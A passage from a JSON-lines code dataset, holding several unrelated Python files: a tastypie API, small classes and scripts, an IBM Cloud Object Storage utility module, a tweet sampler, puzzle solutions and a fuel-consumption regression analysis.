mask,path\n","sub_path":"robosat_pink/flat_datasets.py","file_name":"flat_datasets.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"80224864","text":"from tastypie import fields\nfrom tastypie.resources import ModelResource\nfrom tastypie.authorization import Authorization\nfrom models import Transaction, Category, Entity, File\n\nclass CategoryResource(ModelResource):\n class Meta:\n queryset = Category.objects.all()\n resource_name = 'category'\n authorization = Authorization()\n\nclass EntityResource(ModelResource):\n class Meta:\n queryset = Entity.objects.all()\n resource_name = 'entity'\n authorization = Authorization()\n\nclass FileResource(ModelResource):\n class Meta:\n queryset = File.objects.all()\n resource_name = 'file'\n authorization = Authorization()\n\nclass TransactionResource(ModelResource):\n\n category = fields.ForeignKey(CategoryResource, 'category')\n entity = fields.ForeignKey(EntityResource, 'entity')\n files = fields.ToManyField(FileResource, 'files')\n transactions = fields.ToManyField(FileResource, 'transactions')\n\n class Meta:\n queryset = Transaction.objects.all()\n resource_name = 'transaction'\n authorization = Authorization()\n\n","sub_path":"curo-api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"123662081","text":"class Book :\n def __init__(self, title, author, year, editorial, category):\n self.title = title\n self.author = author\n self.year = year\n self.editorial = editorial\n self.category = category\n \n def displayBook(self):\n q = max(len(\"Title: \" + self.title), \n len(\"Author: \" + self.author), \n len(\"Year: \" + self.year),\n len(\"Category: \" + self.category),\n len(\"Editorial: \" + self.editorial),\n )\n separator = (\"*\"*q)+\"**\"\n\n print(\"\\n{}\".format(separator))\n print(\" Title: {}\".format(self.title)) \n print(\" Author: {}\".format(self.author)) \n print(\" Year: {}\".format(self.year)) \n print(\" Category: {}\".format(self.category)) \n print(\" Editorial: {}\".format(self.editorial)) \n print(\"{} \\n\".format(separator))\n\n \n\n\n","sub_path":"Python - MongoDB CRUD/Model/book_base.py","file_name":"book_base.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"113866650","text":"#/usr/bin/env python\n# -*- coding:utf-8 -*-\n'''\n @File : socket-client.py \n @Contact : guoxin@126.com\n @License : (C)Copyright 2018-2019, xguo\n\n@Modify Time @Author @Version @Desciption\n------------ ------- -------- -----------\n2020/1/12 16:25 xguo 1.0 None\n\n'''\nimport socket\n\ndef main():\n s=socket.socket()\n host=socket.gethostname()\n port=1234\n\n s.connect((host,port))\n print(s.recv(1024))\n\nif __name__ == \"__main__\":\n main()","sub_path":"socket-test/socket-client.py","file_name":"socket-client.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"207783803","text":"import logging\nimport os\nimport datetime\n\nclass Logger(logging.Logger):\n\n file_format = '%(asctime)s.%(msecs)3d %(levelname)-8s %(module)s - %(funcName)s: %(message)s'\n console_format = '%(asctime)s %(levelname)-8s %(name)-12s: %(message)s'\n date_format = '%Y-%m-%d %H:%M:%S'\n path = \"Logs/\"\n\n def __init__(self, name,file_path=None,log_level=logging.INFO,log_console=True):\n if not file_path:\n file_path = Logger.path\n if not os.path.exists(file_path):\n os.makedirs(file_path)\n\n logging.Logger.__init__(self,name)\n run_time = datetime.datetime.now().strftime(\"%d-%m__%H-%M-%S\")\n logging.basicConfig(\n filename='{}/{}__{}'.format(file_path, name, run_time),\n level=log_level,\n format=Logger.file_format,\n datefmt=Logger.date_format)\n\n if log_console:\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n formatter = logging.Formatter(Logger.console_format)\n # tell the handler to use this format\n console.setFormatter(formatter)\n logging.Logger.addHandler(self,console)","sub_path":"utils/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"107102716","text":"import numpy as np\r\nc = 0\r\nres = 0\r\nf = open(\"input.txt\",\"r\")\r\nout = open(\"output.txt\",\"w\")\r\niplines = f.readlines()\r\nlines = [x.strip() for x in iplines]\r\nn = int(lines[0])\r\na = np.zeros(shape=(n,n),dtype=np.int64)\r\nscoot = int(lines[2])\r\ntscoot = scoot * 12\r\n\r\nfor line in lines[3:tscoot+3]:\r\n ind = line.split(',')\r\n i = int(ind[0])\r\n j = int(ind[1])\r\n a[i][j] = a[i][j] + 1\r\n\r\nofficers = int(lines[1])\r\n\r\ndef replacePos(b, row, col):\r\n for i in range(n):\r\n b[row][i] = -1\r\n b[i][col] = -1\r\n for j in range(n):\r\n if abs(i - row) == abs(j - col):\r\n b[i][j] = -1\r\n\r\n\r\ndef counter(array):\r\n val = np.argmax(array)\r\n i = val / n\r\n j = val % n\r\n cop[i][j] = 0\r\n return val\r\n\r\n\r\ndef isSafePos(grid, row, col):\r\n for i in range(n):\r\n if grid[row][i] == 1 or grid[i][col] == 1:\r\n return False\r\n\r\n for i in range(n):\r\n for j in range(n):\r\n if abs(i - row) == abs(j - col) and (grid[i][j] == 1):\r\n return False\r\n return True\r\n\r\n\r\ndef solution(grid, col):\r\n global c\r\n global res\r\n if c > res and col == n:\r\n res = c\r\n return\r\n if col == n:\r\n return\r\n for x in range(0, n):\r\n if isSafePos(grid, x, col):\r\n grid[x][col] = 1\r\n c += a[x][col]\r\n solution(grid, col+1)\r\n grid[x][col] = 0\r\n c -= a[x][col]\r\n\r\n\r\nif officers == 1:\r\n count = np.max(a)\r\n out.write(\"%i\" % (count))\r\n\r\nelif officers < n:\r\n res = 0\r\n cop = np.copy(a)\r\n list = []\r\n for i in range(0, n*n):\r\n r = counter(cop)\r\n list.append(r)\r\n\r\n for index in list:\r\n b = np.copy(a)\r\n c = 0\r\n row = index/n\r\n col = index % n\r\n c += a[row][col]\r\n replacePos(b, row, col)\r\n for i in range(officers-1):\r\n val = np.argmax(b)\r\n i = val/n\r\n j = val % n\r\n c += a[i, j]\r\n replacePos(b,i,j)\r\n\r\n if c > res:\r\n res = c\r\n out.write(\"%i\" % (res))\r\nelse:\r\n grid = np.zeros(shape=(n, n), dtype=np.int64)\r\n solution(grid, 0)\r\n out.write(\"%i\" % (res))\r\n","sub_path":"hw1cs561f2018.py","file_name":"hw1cs561f2018.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"533161356","text":"# *****************************************************************************\r\n# © Copyright IBM Corp. 2018. All Rights Reserved.\r\n#\r\n# This program and the accompanying materials\r\n# are made available under the terms of the Apache V2.0\r\n# which accompanies this distribution, and is available at\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# *****************************************************************************\r\n\r\nimport os\r\nimport tempfile\r\nimport dill as pickle\r\nimport requests\r\nimport datetime\r\nfrom urllib.parse import quote, urlparse\r\nfrom base64 import b64encode\r\nimport hashlib\r\nimport hmac\r\nfrom lxml import etree\r\nimport logging\r\nimport pandas as pd\r\nlogger = logging.getLogger(__name__)\r\ntry:\r\n import ibm_boto3\r\n from ibm_boto3.s3.transfer import S3Transfer\r\n from ibm_botocore.client import Config\r\nexcept (ImportError,ModuleNotFoundError):\r\n IBMBOTO_INSTALLED = False\r\n msg = 'ibm_boto3 is not installed. Use HMAC credentials to communicate with COS.'\r\n logger.info(msg)\r\nelse:\r\n IBMBOTO_INSTALLED = True\r\n \r\ndef compare_dataframes(dfl,dfr,cols=None):\r\n '''\r\n Explain the differences between 2 dataframes\r\n '''\r\n \r\n if cols is None:\r\n cols = list(dfl.columns)\r\n \r\n differences = 0\r\n trace = ''\r\n if len(dfl.index) != len(dfr.index):\r\n msg = 'Row count: %s vs %s' %(dfl.index,dfr.index)\r\n trace = trace + msg\r\n differences += abs(len(dfl.index) - len(dfr.index))\r\n missing_l = set(cols) - set(dfl.columns)\r\n if len(missing_l) != 0:\r\n msg = 'dfl is missing columns:' %(missing_l)\r\n trace = trace + msg\r\n cols = [x for x in cols if x not in missing_l]\r\n differences += len(missing_l) * len(dfl.index)\r\n missing_r = set(cols) - set(dfr.columns)\r\n if len(missing_r) != 0:\r\n msg = 'dfr is missing columns: %s' %(missing_r)\r\n trace = trace + msg\r\n cols = [x for x in cols if x not in missing_r]\r\n differences += len(missing_r) * len(dfr.index)\r\n \r\n dfl = dfl[cols].reindex()\r\n dfr = dfr[cols].reindex()\r\n \r\n dfs = {'dfl':dfl,\r\n 'dfr':dfr}\r\n df = pd.concat(dfs)\r\n total_rows = len(df.index)\r\n df = df.drop_duplicates(keep=False)\r\n if not df.empty and total_rows - len(df.index) > 0:\r\n msg = 'Rows with different contents:%s' %(total_rows - len(df.index))\r\n trace = trace + msg\r\n differences = differences + total_rows - len(df.index)\r\n \r\n return (differences,trace,df)\r\n \r\n\r\nclass CosClient:\r\n '''\r\n Cloud Object Storage client\r\n '''\r\n def __init__(self, credentials):\r\n self._cod_hmac_access_key_id = credentials['objectStorage']['username']\r\n self._cod_hmac_secret_access_key = credentials['objectStorage']['password']\r\n self._cos_region = credentials['objectStorage']['region']\r\n self._cos_endpoint = credentials['config']['objectStorageEndpoint']\r\n\r\n if self._cos_region is None or len(self._cos_region.strip()) == 0:\r\n self._cos_region = 'any-region'\r\n\r\n # hashing and signing methods\r\n def _hash(self, key, msg):\r\n return hmac.new(key, msg.encode('utf-8'), hashlib.sha256).digest()\r\n\r\n # region is a wildcard value that takes the place of the AWS region value\r\n # as COS doen't use the same conventions for regions, this parameter can accept any string\r\n def _create_signature_key(self, key, datestamp, region, service):\r\n keyDate = self._hash(('AWS4' + key).encode('utf-8'), datestamp)\r\n keyString = self._hash(keyDate, region)\r\n keyService = self._hash(keyString, service)\r\n keySigning = self._hash(keyService, 'aws4_request')\r\n return keySigning\r\n\r\n def _cos_api_request(self, http_method, bucket, key, request_parameters=None, payload='', extra_headers=None, binary=False):\r\n if extra_headers is None:\r\n extra_headers = {}\r\n # it seems region is not used by IBM COS and can be any string (but cannot be None below still)\r\n if any([(var is None or len(var.strip()) == 0) for var in [self._cod_hmac_access_key_id, self._cod_hmac_secret_access_key, self._cos_endpoint, bucket]]):\r\n logger.warning('write COS is disabled because not all COS config environment variables are set')\r\n return None\r\n # assemble the standardized request\r\n\r\n time = datetime.datetime.utcnow()\r\n timestamp = time.strftime('%Y%m%dT%H%M%SZ')\r\n datestamp = time.strftime('%Y%m%d')\r\n\r\n url = urlparse(self._cos_endpoint)\r\n scheme = url.scheme\r\n host = url.netloc\r\n\r\n payload_hash = hashlib.sha256(str.encode(payload) if isinstance(payload, str) else payload).hexdigest()\r\n standardized_resource = '/'\r\n if bucket is not None:\r\n standardized_resource += bucket\r\n if key is not None:\r\n standardized_resource += '/' + key\r\n if request_parameters is None:\r\n standardized_querystring = ''\r\n else:\r\n standardized_querystring = '&'.join(['%s=%s' % (quote(k, safe=''), quote(v, safe='')) for k,v in request_parameters.items()])\r\n\r\n all_headers = {'host': host, 'x-amz-content-sha256': payload_hash, 'x-amz-date': timestamp}\r\n all_headers.update({k.lower(): v for k, v in extra_headers.items()})\r\n standardized_headers = ''\r\n for header in sorted(all_headers.keys()):\r\n standardized_headers += '%s:%s\\n' % (header, all_headers[header])\r\n signed_headers = ';'.join(sorted(all_headers.keys()))\r\n # standardized_headers = 'host:' + host + '\\n' + 'x-amz-content-sha256:' + payload_hash + '\\n' + 'x-amz-date:' + timestamp + '\\n'\r\n # signed_headers = 'host;x-amz-content-sha256;x-amz-date'\r\n\r\n standardized_request = (http_method + '\\n' +\r\n standardized_resource + '\\n' +\r\n standardized_querystring + '\\n' +\r\n standardized_headers + '\\n' +\r\n signed_headers + '\\n' +\r\n payload_hash)\r\n\r\n logging.debug('standardized_request=\\n%s' % standardized_request)\r\n\r\n # assemble string-to-sign\r\n hashing_algorithm = 'AWS4-HMAC-SHA256'\r\n credential_scope = datestamp + '/' + self._cos_region + '/' + 's3' + '/' + 'aws4_request'\r\n sts = (hashing_algorithm + '\\n' +\r\n timestamp + '\\n' +\r\n credential_scope + '\\n' +\r\n hashlib.sha256(str.encode(standardized_request)).hexdigest())\r\n\r\n logging.debug('string-to-sign=\\n%s' % sts)\r\n\r\n # generate the signature\r\n signature_key = self._create_signature_key(self._cod_hmac_secret_access_key, datestamp, self._cos_region, 's3')\r\n signature = hmac.new(signature_key,\r\n (sts).encode('utf-8'),\r\n hashlib.sha256).hexdigest()\r\n\r\n logging.debug('signature=\\n%s' % signature)\r\n\r\n # assemble all elements into the 'authorization' header\r\n v4auth_header = (hashing_algorithm + ' ' +\r\n 'Credential=' + self._cod_hmac_access_key_id + '/' + credential_scope + ', ' +\r\n 'SignedHeaders=' + signed_headers + ', ' +\r\n 'Signature=' + signature)\r\n\r\n logging.debug('v4auth_header=\\n%s' % v4auth_header)\r\n\r\n # the 'requests' package autmatically adds the required 'host' header\r\n headers = all_headers.copy()\r\n headers.pop('host')\r\n headers['Authorization'] = v4auth_header\r\n # headers = {'x-amz-content-sha256': payload_hash, 'x-amz-date': timestamp, 'Authorization': v4auth_header}\r\n\r\n if standardized_querystring == '':\r\n request_url = self._cos_endpoint + standardized_resource\r\n else:\r\n request_url = self._cos_endpoint + standardized_resource + '?' + standardized_querystring\r\n\r\n logging.debug('request_url=%s' % request_url)\r\n\r\n if http_method == 'GET':\r\n resp = requests.get(request_url, headers=headers, timeout=30, verify=True)\r\n elif http_method == 'DELETE':\r\n resp = requests.delete(request_url, headers=headers, timeout=30, verify=True)\r\n elif http_method == 'POST':\r\n resp = requests.post(request_url, headers=headers, data=payload, timeout=30, verify=True)\r\n elif http_method == 'PUT':\r\n resp = requests.put(request_url, headers=headers, data=payload, timeout=30, verify=True)\r\n else:\r\n raise RuntimeError('unsupported_http_method=%s' % http_method)\r\n\r\n if resp.status_code != requests.codes.ok and not (resp.status_code == requests.codes.no_content and http_method == 'DELETE'):\r\n logger.warning('error cos_api_request: request_url=%s, http_method=%s, status_code=%s, response_text=%s' % (request_url, http_method, str(resp.status_code), str(resp.text)))\r\n return None\r\n\r\n return resp.content if binary else resp.text\r\n\r\n def cos_get(self, key, bucket, request_parameters=None, binary=False):\r\n\r\n response = self._cos_api_request('GET', bucket=bucket, key=key, request_parameters=request_parameters, binary=binary)\r\n if response is not None:\r\n response = pickle.loads(response)\r\n\r\n return response\r\n\r\n def cos_find(self, prefix, bucket):\r\n result = self.cos_get(key=None, bucket=bucket, request_parameters={'list-type':'2','prefix':prefix})\r\n if result is None:\r\n return []\r\n\r\n root = etree.fromstring(str.encode(result))\r\n return [elem.text for elem in root.findall('Contents/Key', root.nsmap)]\r\n\r\n def cos_put(self, key, payload, bucket, binary=False):\r\n if payload is not None:\r\n payload = pickle.dumps(payload)\r\n else:\r\n payload = ''\r\n\r\n return self._cos_api_request('PUT', bucket=bucket, key=key, payload=payload, binary=binary)\r\n\r\n\r\n def cos_delete(self, key, bucket):\r\n return self._cos_api_request('DELETE', bucket=bucket, key=key)\r\n\r\n\r\n def cos_delete_multiple(self, keys, bucket):\r\n if keys is None or len(keys) == 0:\r\n return ''\r\n\r\n payload = ''\r\n for key in keys:\r\n payload += '%s' % key\r\n payload += ''\r\n\r\n md5 = hashlib.md5(str.encode(payload)).digest()\r\n base64 = b64encode(md5).decode()\r\n logger.debug('content-md5: %s' % base64)\r\n\r\n extra_headers = {\r\n 'Content-Type': 'text/plain; charset=utf-8',\r\n 'Content-MD5': base64\r\n }\r\n\r\n request_parameters = {'delete': ''}\r\n return self._cos_api_request('POST', bucket=bucket, key=None, payload=payload, request_parameters=request_parameters, extra_headers=extra_headers)\r\n \r\n\r\ndef cosSave(obj,bucket,filename,credentials):\r\n '''\r\n Use IAM credentials to write an object to Cloud Object Storage\r\n '''\r\n try:\r\n fhandle, fname = tempfile.mkstemp(\"cosfile\")\r\n os.close(fhandle) \r\n with open(fname, 'wb') as file_obj:\r\n pickle.dump(obj, file_obj)\r\n transfer = getCosTransferAgent(credentials)\r\n transfer.upload_file(fname, bucket, filename)\r\n os.unlink(fname)\r\n\r\n except Exception as ex:\r\n logging.exception(ex)\r\n return filename\r\n\r\n\r\n\r\ndef cosLoad(bucket,filename,credentials):\r\n '''\r\n Use IAM credentials to read an object from Cloud Object Storage\r\n '''\r\n try:\r\n fhandle, fname = tempfile.mkstemp(\"cosfile\")\r\n os.close(fhandle)\r\n transfer = getCosTransferAgent(credentials)\r\n transfer.download_file(bucket, filename, fname)\r\n answer = None\r\n with open(fname, 'rb') as file_obj:\r\n answer = pickle.load(file_obj)\r\n os.unlink(fname)\r\n return answer\r\n\r\n except Exception as ex:\r\n logging.exception(ex)\r\n\r\n\r\n\r\ndef getCosTransferAgent(credentials):\r\n '''\r\n Use IAM credentials to obtain a Cloud Object Storage transfer agent object\r\n '''\r\n if IBMBOTO_INSTALLED:\r\n endpoints = requests.get(credentials.get('endpoints')).json()\r\n iam_host = (endpoints['identity-endpoints']['iam-token'])\r\n cos_host = (endpoints['service-endpoints']['cross-region']['us']['public']['us-geo'])\r\n api_key = credentials.get('apikey')\r\n service_instance_id = credentials.get('resource_instance_id')\r\n auth_endpoint = \"https://\" + iam_host + \"/oidc/token\"\r\n service_endpoint = \"https://\" + cos_host\r\n cos = ibm_boto3.client('s3',\r\n ibm_api_key_id=api_key,\r\n ibm_service_instance_id=service_instance_id,\r\n ibm_auth_endpoint=auth_endpoint,\r\n config=Config(signature_version='oauth'),\r\n endpoint_url=service_endpoint)\r\n return S3Transfer(cos)\r\n else:\r\n raise ValueError('Attempting to use IAM credentials to communicate with COS. IBMBOTO is not installed. You make use HMAC credentials and the CosClient instead.')\r\n\r\ndef log_df_info(df,msg,include_data=False):\r\n '''\r\n Log a debugging entry showing first row and index structure\r\n '''\r\n try:\r\n msg = msg + ' df count: %s ' %(len(df.index))\r\n if df.index.names != [None]:\r\n msg = msg + ' ; index: %s ' %(','.join(df.index.names))\r\n else:\r\n msg = msg + ' ; index is unnamed'\r\n if include_data:\r\n msg = msg + ' ; 1st row: '\r\n try:\r\n cols = df.head(1).squeeze().to_dict() \r\n for key,value in list(cols.items()):\r\n msg = msg + '%s : %s, ' %(key, value)\r\n except AttributeError:\r\n msg = msg + str(df.head(1))\r\n else:\r\n msg = msg + ' ; columns: %s' %(','.join(list(df.columns)))\r\n logger.debug(msg)\r\n return msg\r\n except Exception:\r\n logger.warning('dataframe contents not logged due to an unknown logging error')\r\n return ''\r\n \r\ndef resample(df,time_frequency,timestamp,dimensions=None,agg=None, default_aggregate = 'last'):\r\n '''\r\n Resample a dataframe to a new time grain / dimensional grain\r\n \r\n Parameters:\r\n -----------\r\n df: Pandas dataframe\r\n Dataframe to resample\r\n time_frequency: str\r\n Pandas frequency string\r\n dimensions: list of strs\r\n List of columns to group by\r\n agg : dict\r\n Pandas aggregate dictionary\r\n default_aggregate: str\r\n Default aggregation function to apply for anything not specified in agg\r\n \r\n Returns\r\n -------\r\n Pandas dataframe\r\n \r\n '''\r\n if dimensions is None:\r\n dimensions = []\r\n if agg is None:\r\n agg = {}\r\n \r\n df = df.reset_index()\r\n\r\n index_cols = [timestamp]\r\n index_cols.extend(dimensions) \r\n for r in [x for x in df.columns if x not in index_cols]:\r\n try:\r\n agg[r]\r\n except KeyError:\r\n agg[r] = default_aggregate\r\n\r\n group_base = [pd.Grouper(key = timestamp, freq = time_frequency)]\r\n for d in dimensions:\r\n group_base.append(pd.Grouper(key = d))\r\n \r\n df = df.groupby(group_base).agg(agg)\r\n df.reset_index(inplace=True)\r\n \r\n return df\r\n \r\nclass MemoryOptimizer:\r\n '''\r\n Util class used to optimize the pipeline memory consumption using native Pandas downcasting\r\n '''\r\n\r\n def printCurrentMemoryConsumption(self, df):\r\n logger.info('Memory consumed by the data frame: \\n %s' % df.memory_usage(deep=True))\r\n\r\n def printUsagePerType(self, df):\r\n for dtype in ['float', 'int', 'object']:\r\n selected_dtype = df.select_dtypes(include=[dtype])\r\n mean_usage_b = selected_dtype.memory_usage(deep=True).mean()\r\n mean_usage_mb = mean_usage_b / 1024 ** 2\r\n logger.info(\"Average memory usage for {} columns: {:03.2f} MB\".format(dtype, mean_usage_mb))\r\n\r\n def downcastInteger(self, df):\r\n df_new = df.copy()\r\n\r\n logger.info('Applying downcast to Integer columns.')\r\n\r\n try:\r\n df_int = df_new.select_dtypes(include=['int'])\r\n\r\n if not df_int.empty:\r\n df_converted = df_int.apply(pd.to_numeric, downcast='unsigned')\r\n for col in df_converted.columns:\r\n df_new[col] = df_converted[col]\r\n except:\r\n logger.warning('Not able to downcast Integer')\r\n return df_new\r\n\r\n return df_new\r\n\r\n\r\n def downcastFloat(self, df, precison='float'):\r\n df_new = df.copy()\r\n\r\n logger.info('Applying downcast to Float columns.')\r\n\r\n try:\r\n df_float = df_new.select_dtypes(include=['float'])\r\n\r\n if not df_float.empty:\r\n df_converted = df_float.apply(pd.to_numeric, downcast=precison)\r\n for col in df_converted.columns:\r\n df_new[col] = df_converted[col]\r\n except:\r\n logger.warning('Not able to downcast Float types')\r\n return df_new\r\n\r\n return df_new\r\n\r\n\r\n def getColumnsForCategorization(self, df, threshold=0.5):\r\n '''\r\n It generates a list of columns that are elegible to be categorized.\r\n The column name is printed if the number of unique values is proportionally greater than 50% of the total number of rows.\r\n Threshold is customized.\r\n '''\r\n\r\n df_new = df.select_dtypes(include=['object']).copy()\r\n\r\n lst_columns = []\r\n for col in df_new.columns:\r\n num_unique_values = len(df_new[col].unique())\r\n num_total_values = len(df_new[col])\r\n if num_unique_values / num_total_values < threshold:\r\n logger.info('Column elegible for categorization: %s' % col)\r\n lst_columns.append(col)\r\n\r\n return lst_columns\r\n\r\n\r\n def downcastString(self, df, lst_columns):\r\n '''\r\n It converts a data frame column type object into a categorical type\r\n '''\r\n\r\n logger.info('Applying downcast to String columns. %s' % str(lst_columns))\r\n\r\n df_new = df.select_dtypes(include=['object']).copy()\r\n\r\n try:\r\n for col in lst_columns:\r\n df_new.loc[:, col] = df_new[col].astype('category')\r\n except:\r\n logger.warning('Not able to downcast String to category')\r\n return df\r\n\r\n return df_new\r\n\r\n\r\n def downcastNumeric(self, df):\r\n\r\n logger.info('Optimizing memory. Before applying downcast.')\r\n self.printUsagePerType(df)\r\n self.printCurrentMemoryConsumption(df)\r\n\r\n df_new = self.downcastInteger(df)\r\n df_new = self.downcastFloat(df_new)\r\n\r\n logger.info('Optimizing memory. After applying downcast.')\r\n self.printUsagePerType(df_new)\r\n self.printCurrentMemoryConsumption(df_new)\r\n\r\n return df_new\r\n\r\nclass StageException(Exception):\r\n EXTENSION_DICT = 'extensionDict'\r\n STAGENAME = 'stageName'\r\n STAGEINFO = 'stageInfo'\r\n def __init__(self, msg, stageName=None, stageInfo=None):\r\n super().__init__(msg)\r\n setattr(self, StageException.EXTENSION_DICT, {StageException.STAGENAME: stageName, StageException.STAGEINFO: stageInfo})\r\n ","sub_path":"iotfunctions/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":19424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"182409908","text":"DATA_DIR = \"../data/\"\nCSV_NAME = \"04-Feb-2019_similar_removed\"\nFIELDS = [\"Username\", \"Full name\", \"URL\", \"Timestamp\", \"Content\", \"No. replies\", \"No. retweets\", \"No. likes\"]\nCOUNT = 1000\n\nif __name__ == '__main__':\n import csv\n import random\n\n from tqdm import tqdm\n\n print(\"Writing to file...\")\n with open(DATA_DIR + CSV_NAME + '.csv', 'r', encoding='utf-8', newline='') as f:\n reader = csv.DictReader(f, FIELDS)\n next(reader)\n filepath = \"{}_random_{}.csv\".format(DATA_DIR + CSV_NAME, COUNT)\n with open(filepath, 'a', encoding='utf-8', newline='') as w:\n writer = csv.writer(w)\n writer.writerow([\"Row Number\", \"Content\", \"Label\"])\n rows_written = 0\n for i, row in tqdm(enumerate(reader), total=COUNT):\n if random.random() >= 0.9:\n writer.writerow([i, row[\"Content\"]])\n rows_written += 1\n if rows_written == COUNT:\n break\n print(\"Done. Selected tweets are written to\", filepath)\n","sub_path":"build/lib/classifier/get_random_tweet.py","file_name":"get_random_tweet.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"459529808","text":"for i in range(int(input())):\n N = int(input())\n print('Case #%d: ' % (1+i), end='')\n digits = [str(s) for s in range(10)]\n digits_bool = [False]*10\n if N == 0:\n print('INSOMNIA')\n continue\n\n for j in range(1,1000000):\n new_num_str = str(j*N)\n #print(new_num_str)\n #print(digits_bool)\n for k, d in enumerate(digits):\n if d in new_num_str:\n digits_bool[k] = True\n if all(d for d in digits_bool):\n print(new_num_str)\n break\n\n","sub_path":"codes/CodeJamCrawler/16_0_1/tbmbob/count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"154625436","text":"import pandas as pd\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimport pylab as plt\n\n'''\nFuelConsumtionCo2.csv\nN = 1067\n[MODELYEAR, MAKE, MODEL, VEHICLECLASS, ENGINESIZE, CYLINDERS, TRANSMISSION, FUELTYPE,\nFUELCONSUMPTION_CITY, FUELCONSUMPTION_HWY, FUELCONSUMPTION_COMB,\nFUELCONSUMPTION_COMB_MPG, CO2EMISSIONS]\n\n\n'''\n\n\ndf = pd.read_csv(\"/Users/patryklaskowski/Desktop/python3/projekty/fuelConsumptionCo2/fuelConsumptionCo2.csv\")\n\nprint(df.head(2))\n\nprint(\"\\nN = \", df[list(df.describe())[0]].count(), \"counted by '\", list(df.describe())[0], \"'\\n\") #returns 1st coulmn numerical amount\n\n#print(\"\\n\\nDESCRIBE:\\n\", df.describe())\n\nprint(\"Columns:\\n\", list(df.describe()), \"\\n\") #returns columns names as a list\n\nprint(\"Numerical values range: \")\nfor feature in list(df.describe()): #shows range of all numerical features\n print(\"\\t\", feature, \":\", min(df[feature]), \"-\", max(df[feature]))\n\nsdf = df[['ENGINESIZE', 'CYLINDERS', 'FUELCONSUMPTION_COMB', 'CO2EMISSIONS']] #new dataframe created\nprint(\"\\n\\n\\n*NEW DATAFRAME DREATED*\\n=> \", list(sdf))\n\nsdf.hist(bins=10,color='g') #return density of values\nplt.show()\n\nplt.scatter(sdf.ENGINESIZE, sdf.CO2EMISSIONS, color='g')\nplt.title(\"Scatterplot of CO2EMISSIONS and ENGINESIZE relation\")\nplt.ylabel(\"CO2EMISSIONS\")\nplt.xlabel(\"ENGINESIZE\")\nplt.show()\n\nplt.scatter(sdf.FUELCONSUMPTION_COMB, sdf.CO2EMISSIONS, color='g')\nplt.title(\"Scatterplot of CO2EMISSIONS and FUELCONSUMPTION_COMB relation\")\nplt.ylabel(\"CO2EMISSIONS\")\nplt.xlabel(\"FUELCONSUMPTION_COMB\")\nplt.show()\n\n\n'''\n\nSIMPLE REGRESSION MODEL\nlets predict some data and check the results\n\nLinear regression is going to find the best coefficients Beta_i (B1, B2, ..., Bn)\nwhich means that residual sum of squares between x and y with these Betas will be the lowest.\n\n'''\n\nmask = np.random.rand(len(sdf)) < 0.8 #returns 20% of False and 80% of True statements\ntrain = sdf[mask] #all Trues (80% of data)\ntest = sdf[~mask] #all Falses (20% of data)\n\nplt.scatter(train.ENGINESIZE, train.CO2EMISSIONS, 15, color=\"black\", label=\"Train set (80%)\")\nplt.scatter(test.ENGINESIZE, test.CO2EMISSIONS, 5, color=\"orange\", label=\"Test set (20%)\")\nplt.xlabel(\"Engine size\")\nplt.ylabel(\"CO2 Emission\")\nplt.title(\"Scatterplot of relation between CO2 Emission and Engine size\\nSplit for train and test set\")\nplt.legend()\nplt.plot()\nplt.show()\n\nfrom sklearn import linear_model\n\nregr = linear_model.LinearRegression() #inicializing the Linear Regression model\ntrain_X_EngineSize = train[['ENGINESIZE']]\ntrain_Y_CO2Emissions = train[['CO2EMISSIONS']]\n'''\n#You can transform data from dataframe to array by:\ntrain_X_EngineSize = np.asanyarray(train_X_EngineSize)\ntrain_Y_CO2Emissions = np.asanyarray(train_Y_CO2Emissions)\n'''\nregr.fit(train_X_EngineSize, train_Y_CO2Emissions) #fitting the Linear Regression with given dataset\nprint('Coefficients: ', regr.coef_) #only one coef returned, this is SIMPLY linear regression model\nprint ('Intercept: ',regr.intercept_)\n\n#test_X_EngineSize = test[['ENGINESIZE']]\n#y_hat = regr.predict() #you can easly predict the data using \n\n\n'''\nLets see our simple linear regression model fitted to our dataset\nit's CO2EMISSIONS based on ENGINESIZE\n'''\n\nplt.scatter(train.ENGINESIZE, train.CO2EMISSIONS, 1, color=\"g\", label=\"Train set\")\nplt.plot(train_X_EngineSize, regr.coef_[0][0]*train_X_EngineSize +regr.intercept_[0], color=\"black\", label=\"Simple linear regression\")\nplt.xlabel(\"Engine size\")\nplt.ylabel(\"Emission\")\nplt.legend()\nplt.title(\"Simple linear regression model\")\nplt.show()\n\n\nfrom sklearn.metrics import r2_score\n\ntest_x = np.asanyarray(test[['ENGINESIZE']])\ntest_y = np.asanyarray(test[['CO2EMISSIONS']])\ntest_y_ = regr.predict(test_x)\n\nprint(\"\\n\\nMean absolute error: %.2f\" % np.mean(np.absolute(test_y_ - test_y)))\nprint(\"Residual sum of squares (MSE): %.2f\" % np.mean((test_y_ - test_y) ** 2))\nprint(\"R2-score: %.2f\" % r2_score(test_y_ , test_y) )\n","sub_path":"fuelConsumptionCo2/fuelConsumptionCo2.py","file_name":"fuelConsumptionCo2.py","file_ext":"py","file_size_in_byte":3891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} 